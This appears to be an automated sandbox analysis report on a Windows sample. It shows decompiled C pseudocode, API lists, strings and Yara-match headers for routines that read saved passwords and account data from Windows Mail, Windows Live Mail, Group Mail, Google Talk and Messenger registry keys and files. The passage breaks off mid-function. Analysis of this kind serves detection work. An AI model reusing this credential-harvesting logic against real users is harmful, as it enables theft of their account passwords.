                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                  • API String ID: 2768085393-1693574875
                                                  • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                  • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                  • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                  • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                  				struct HINSTANCE__* _t33;
                                                  				intOrPtr* _t35;
                                                  				intOrPtr* _t36;
                                                  				void* _t39;
                                                  				void _t41;
                                                  				intOrPtr _t48;
                                                  				signed int _t50;
                                                  				int _t52;
                                                  				intOrPtr _t55;
                                                  				signed int _t56;
                                                  				signed int _t57;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr* _t69;
                                                  				int _t70;
                                                  				void* _t71;
                                                  				intOrPtr _t79;
                                                  
                                                  				_push(0x70);
                                                  				_push(0x4123e0);
                                                  				E00411840(__ebx, __edi, __esi);
                                                  				_t33 = GetModuleHandleA(0);
                                                  				if(_t33->i != 0x5a4d) {
                                                  					L4:
                                                  					 *(_t71 - 0x1c) = 0;
                                                  				} else {
                                                  					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                  					if( *_t65 != 0x4550) {
                                                  						goto L4;
                                                  					} else {
                                                  						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
                                                  						if(_t56 == 0x10b) {
                                                  							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
                                                  							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
                                                  								goto L4;
                                                  							} else {
                                                  								_t57 = 0;
                                                  								__eflags =  *(_t65 + 0xe8);
                                                  								goto L9;
                                                  							}
                                                  						} else {
                                                  							if(_t56 == 0x20b) {
                                                  								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
                                                  								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
                                                  									goto L4;
                                                  								} else {
                                                  									_t57 = 0;
                                                  									__eflags =  *(_t65 + 0xf8);
                                                  									L9:
                                                  									_t9 = __eflags != 0;
                                                  									__eflags = _t9;
                                                  									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
                                                  								}
                                                  							} else {
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				 *(_t71 - 4) = 0;
                                                  				__set_app_type(2);
                                                  				 *0x417b6c =  *0x417b6c | 0xffffffff;
                                                  				 *0x417b70 =  *0x417b70 | 0xffffffff;
                                                  				_t35 = __p__fmode();
                                                  				_t62 =  *0x416b8c; // 0x0
                                                  				 *_t35 = _t62;
                                                  				_t36 = __p__commode();
                                                  				_t63 =  *0x416b88; // 0x0
                                                  				 *_t36 = _t63;
                                                  				 *0x417b68 =  *_adjust_fdiv;
                                                  				_t39 = E00401A4D();
                                                  				_t79 =  *0x416000; // 0x1
                                                  				if(_t79 == 0) {
                                                  					__setusermatherr(E00401A4D);
                                                  					_pop(_t63);
                                                  				}
                                                  				E0041182C(_t39);
                                                  				_push(0x4123b0);
                                                  				_push(0x4123ac);
                                                  				L00411826();
                                                  				_t41 =  *0x416b84; // 0x0
                                                  				 *(_t71 - 0x20) = _t41;
                                                  				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
                                                  				_push(0x4123a8);
                                                  				_push(0x412394); // executed
                                                  				L00411826(); // executed
                                                  				_t69 =  *_acmdln;
                                                  				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                  				if( *_t69 != 0x22) {
                                                  					while(1) {
                                                  						__eflags =  *_t69 - 0x20;
                                                  						if(__eflags <= 0) {
                                                  							goto L17;
                                                  						}
                                                  						_t69 = _t69 + 1;
                                                  						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                  					}
                                                  				} else {
                                                  					do {
                                                  						_t69 = _t69 + 1;
                                                  						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                  						_t55 =  *_t69;
                                                  					} while (_t55 != 0 && _t55 != 0x22);
                                                  					if( *_t69 == 0x22) {
                                                  						L16:
                                                  						_t69 = _t69 + 1;
                                                  						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                  					}
                                                  				}
                                                  				L17:
                                                  				_t48 =  *_t69;
                                                  				if(_t48 != 0 && _t48 <= 0x20) {
                                                  					goto L16;
                                                  				}
                                                  				 *(_t71 - 0x4c) = 0;
                                                  				GetStartupInfoA(_t71 - 0x78);
                                                  				_t87 =  *(_t71 - 0x4c) & 0x00000001;
                                                  				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
                                                  					_t50 = 0xa;
                                                  				} else {
                                                  					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
                                                  				}
                                                  				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
                                                  				_t70 = _t52;
                                                  				 *(_t71 - 0x7c) = _t70;
                                                  				if( *(_t71 - 0x1c) == 0) {
                                                  					exit(_t70); // executed
                                                  				}
                                                  				__imp___cexit();
                                                  				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                  				return E00411879(_t70);
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                  • String ID:
                                                  • API String ID: 3662548030-0
                                                  • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                  • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                  • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                  • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E00410D1B(void* __eflags, intOrPtr _a4) {
                                                  				void _v275;
                                                  				char _v276;
                                                  				char _v532;
                                                  				void _v539;
                                                  				char _v540;
                                                  				void _v795;
                                                  				char _v796;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				int _t44;
                                                  				char* _t46;
                                                  				char* _t48;
                                                  				void* _t64;
                                                  				intOrPtr _t65;
                                                  				void* _t66;
                                                  				signed int _t68;
                                                  				void* _t74;
                                                  				void* _t75;
                                                  
                                                  				_t75 = __eflags;
                                                  				_v796 = 0;
                                                  				memset( &_v795, 0, 0x104);
                                                  				_t64 = 0x1c;
                                                  				_t61 =  &_v796;
                                                  				 *((intOrPtr*)(_a4 + 4)) = 1;
                                                  				E0040EE59( &_v796, _t64); // executed
                                                  				E00406734( &_v796, "\\Microsoft\\Windows Mail");
                                                  				_t65 = _a4;
                                                  				E00410C43(_t65, _t75, _t61); // executed
                                                  				 *((intOrPtr*)(_t65 + 4)) = 2;
                                                  				_t66 = 0x1c;
                                                  				E0040EE59(_t61, _t66);
                                                  				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
                                                  				E00410C43(_a4, _t75, _t61); // executed
                                                  				_v276 = 0;
                                                  				memset( &_v275, 0, 0x104);
                                                  				_v540 = 0;
                                                  				memset( &_v539, 0, 0x104);
                                                  				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
                                                  				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
                                                  				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
                                                  				_t44 = strlen( &_v540);
                                                  				if(_t44 > 0) {
                                                  					_t48 = _t74 + _t44 + 0x117;
                                                  					if( *_t48 == 0x5c) {
                                                  						 *_t48 = 0;
                                                  					}
                                                  				}
                                                  				_push( &_v532);
                                                  				_t46 =  &_v796;
                                                  				_push(_t46);
                                                  				L004115B2();
                                                  				_t78 = _t46;
                                                  				if(_t46 != 0) {
                                                  					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
                                                  				}
                                                  				return _t46;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 00410D3C
                                                    • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                    • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                    • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                    • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                    • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                    • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                  • memset.MSVCRT ref: 00410DAA
                                                  • memset.MSVCRT ref: 00410DC5
                                                    • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                  • strlen.MSVCRT ref: 00410E0C
                                                  • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                  Strings
                                                  • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                  • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                  • Store Root, xrefs: 00410DD6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                  • API String ID: 4071991895-2578778931
                                                  • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                  • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                  • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                  • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
                                                  				char _v276;
                                                  				char _v404;
                                                  				intOrPtr _v408;
                                                  				char _v792;
                                                  				intOrPtr _v796;
                                                  				char _v924;
                                                  				char _v936;
                                                  				void _v1959;
                                                  				char _v1960;
                                                  				void _v2983;
                                                  				char _v2984;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				void* _t28;
                                                  				void* _t50;
                                                  				void* _t51;
                                                  				char* _t59;
                                                  				char* _t63;
                                                  				void* _t70;
                                                  
                                                  				_t70 = __fp0;
                                                  				_t51 = __ecx;
                                                  				_v1960 = 0;
                                                  				memset( &_v1959, 0, 0x3ff);
                                                  				_v2984 = 0;
                                                  				memset( &_v2983, 0, 0x3ff);
                                                  				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
                                                  				if(_t28 == 0) {
                                                  					return _t28;
                                                  				}
                                                  				E004021D8( &_v936);
                                                  				_push( &_v1960);
                                                  				_t50 = 0x7f;
                                                  				E004060D0(_t50,  &_v276);
                                                  				_t59 =  &_v404;
                                                  				E004060D0(_t50, _t59,  &_v2984);
                                                  				_v796 = 9;
                                                  				_v408 = 3;
                                                  				_t63 = strchr(_t59, 0x40);
                                                  				_push( &_v404);
                                                  				if(_t63 == 0) {
                                                  					if(strlen() + 0xa < 0) {
                                                  						sprintf( &_v792, "%s@yahoo.com",  &_v404);
                                                  					}
                                                  				} else {
                                                  					strcpy( &_v792, ??);
                                                  					 *_t63 = 0;
                                                  				}
                                                  				strcpy( &_v924,  &_v404);
                                                  				return E00402407( &_v936, _t70, _a4);
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 004037D2
                                                  • memset.MSVCRT ref: 004037E6
                                                    • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                    • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                    • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                    • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                  • strchr.MSVCRT ref: 00403855
                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                  • strlen.MSVCRT ref: 0040387E
                                                  • sprintf.MSVCRT ref: 0040389E
                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                  • String ID: %s@yahoo.com
                                                  • API String ID: 1649821605-3288273942
                                                  • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                  • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                  • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                  • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
                                                  				void _v267;
                                                  				char _v268;
                                                  				void _v531;
                                                  				char _v532;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t15;
                                                  				void* _t23;
                                                  				char* _t28;
                                                  
                                                  				_t23 = __ecx;
                                                  				_v532 = 0;
                                                  				memset( &_v531, 0, 0x104);
                                                  				_v268 = 0;
                                                  				memset( &_v267, 0, 0x104);
                                                  				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
                                                  				if(_t15 != 0) {
                                                  					strcpy( &_v268,  &_v532);
                                                  					_t28 =  &_v268;
                                                  					E00405F1F(_t28);
                                                  					strcat(_t28, "fb.dat");
                                                  					return E004033D7(_t28, __fp0, _a4);
                                                  				}
                                                  				return _t15;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 004034EB
                                                  • memset.MSVCRT ref: 00403501
                                                    • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                  • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                    • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                    • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                  • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetstrcat$Closestrcpystrlen
                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                  • API String ID: 1387626053-966475738
                                                  • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                  • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                  • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                  • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
                                                  				void* _v0;
                                                  				char _v4;
                                                  				long _t29;
                                                  				void* _t33;
                                                  				void* _t36;
                                                  				signed int _t54;
                                                  				void* _t56;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  
                                                  				_t50 = __ecx;
                                                  				E004118A0(0x1110, __ecx);
                                                  				E0040724C(_a4); // executed
                                                  				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
                                                  				_t56 = (_t54 & 0xfffffff8) + 0xc;
                                                  				if(_t29 == 0) {
                                                  					_a4 = 0;
                                                  					_a12 = 0;
                                                  					memset( &_a13, 0, 0xff);
                                                  					_t57 = _t56 + 0xc;
                                                  					_t33 = E0040EC05(_v0, 0,  &_a12);
                                                  					while(1) {
                                                  						_t58 = _t57 + 0xc;
                                                  						if(_t33 != 0) {
                                                  							break;
                                                  						}
                                                  						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
                                                  						_t57 = _t58 + 0xc;
                                                  						if(_t36 == 0) {
                                                  							_a268 = 0;
                                                  							memset( &_a269, 0, 0xfff);
                                                  							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
                                                  							_t57 = _t57 + 0x18;
                                                  							E00407406( &_a268, _a4,  &_a12);
                                                  							RegCloseKey(_v0);
                                                  						}
                                                  						_a4 = _a4 + 1;
                                                  						_t33 = E0040EC05(_v0, _a4,  &_a12);
                                                  					}
                                                  					_t29 = RegCloseKey(_v0);
                                                  				}
                                                  				return _t29;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                    • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                    • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                    • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                    • Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
                                                    • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                    • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                    • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                    • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                    • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                    • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 0040759B
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • memset.MSVCRT ref: 004075EC
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                  • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                  Strings
                                                  • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                  • String ID: Software\Google\Google Talk\Accounts
                                                  • API String ID: 2959138223-1079885057
                                                  • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                  • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                  • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                  • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 64%
                                                  			E0040A5AC(void* __eax) {
                                                  				void* __esi;
                                                  				_Unknown_base(*)()* _t26;
                                                  				void* _t31;
                                                  				intOrPtr _t34;
                                                  				char* _t44;
                                                  				void* _t45;
                                                  				intOrPtr* _t46;
                                                  				int _t47;
                                                  
                                                  				_t45 = __eax;
                                                  				_t37 =  *((intOrPtr*)(__eax + 0x37c));
                                                  				_t47 = 0;
                                                  				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
                                                  					do {
                                                  						_t31 = E00406DEB(_t47, _t37);
                                                  						_push(_t31);
                                                  						_push("/sort");
                                                  						L004115C4();
                                                  						if(_t31 == 0) {
                                                  							_t4 = _t47 + 1; // 0x1
                                                  							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
                                                  							_t54 =  *_t44 - 0x7e;
                                                  							_t34 =  *((intOrPtr*)(_t45 + 0x370));
                                                  							if( *_t44 != 0x7e) {
                                                  								_push(0);
                                                  							} else {
                                                  								_push(1);
                                                  								_t44 = _t44 + 1;
                                                  							}
                                                  							_push(_t44);
                                                  							E0040A119(_t34, _t54);
                                                  						}
                                                  						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
                                                  						_t47 = _t47 + 1;
                                                  					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
                                                  				}
                                                  				E00405E2C();
                                                  				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
                                                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
                                                  				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
                                                  					_t46 =  *((intOrPtr*)(_t45 + 0x370));
                                                  					if( *0x41748c == 0) {
                                                  						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
                                                  						 *0x41748c = 1;
                                                  					}
                                                  					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
                                                  					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
                                                  				}
                                                  				return SetCursor( *0x416b98);
                                                  			}


                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cursor_mbsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 882979914-1578091866
                                                  • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                  • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                  • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                  • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 25%
                                                  			E0040EE59(char* __edi, void* __esi) {
                                                  				void* _v8;
                                                  				char _v40;
                                                  				void _v299;
                                                  				char _v300;
                                                  				void* _t32;
                                                  				char* _t37;
                                                  				void* _t38;
                                                  
                                                  				_t38 = __esi;
                                                  				_t37 = __edi;
                                                  				E0040EDAC();
                                                  				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
                                                  					_v300 = 0;
                                                  					memset( &_v299, 0, 0x103);
                                                  					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
                                                  						_push( &_v8);
                                                  						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                  						_push(0x80000002);
                                                  					} else {
                                                  						_push( &_v8);
                                                  						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                  						_push(0x80000001);
                                                  					}
                                                  					if(E0040EB3F() == 0) {
                                                  						E0040EDDB(_t38);
                                                  						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
                                                  						RegCloseKey(_v8);
                                                  					}
                                                  					strcpy(_t37,  &_v300);
                                                  					return 0 |  *_t37 != 0x00000000;
                                                  				} else {
                                                  					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
                                                  					return _t32;
                                                  				}
                                                  			}


                                                  APIs
                                                    • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74B04DE0,?,00000000), ref: 0040EDBA
                                                    • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                  • memset.MSVCRT ref: 0040EEAE
                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                  • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                    • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 181880968-2036018995
                                                  • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                  • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                  • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                  • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
                                                  				char _v528;
                                                  				intOrPtr _v540;
                                                  				char _v796;
                                                  				char _v1052;
                                                  				void* _v1056;
                                                  				void* _v1060;
                                                  				int _v1064;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				void* _t21;
                                                  				long _t23;
                                                  				void** _t24;
                                                  				long _t26;
                                                  				int _t32;
                                                  				void* _t52;
                                                  
                                                  				_t52 = __fp0;
                                                  				_v540 = 0x412e80;
                                                  				E004046D7( &_v528);
                                                  				_t32 = 0;
                                                  				_v1052 = 0;
                                                  				_v796 = 0;
                                                  				_v1064 = 0;
                                                  				do {
                                                  					if(_v1064 != _t32) {
                                                  						__eflags = _v1064 - 1;
                                                  						if(__eflags != 0) {
                                                  							_t21 = E0040D5DB( &_v1052, __eflags); // executed
                                                  						} else {
                                                  							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
                                                  							__eflags = _t23;
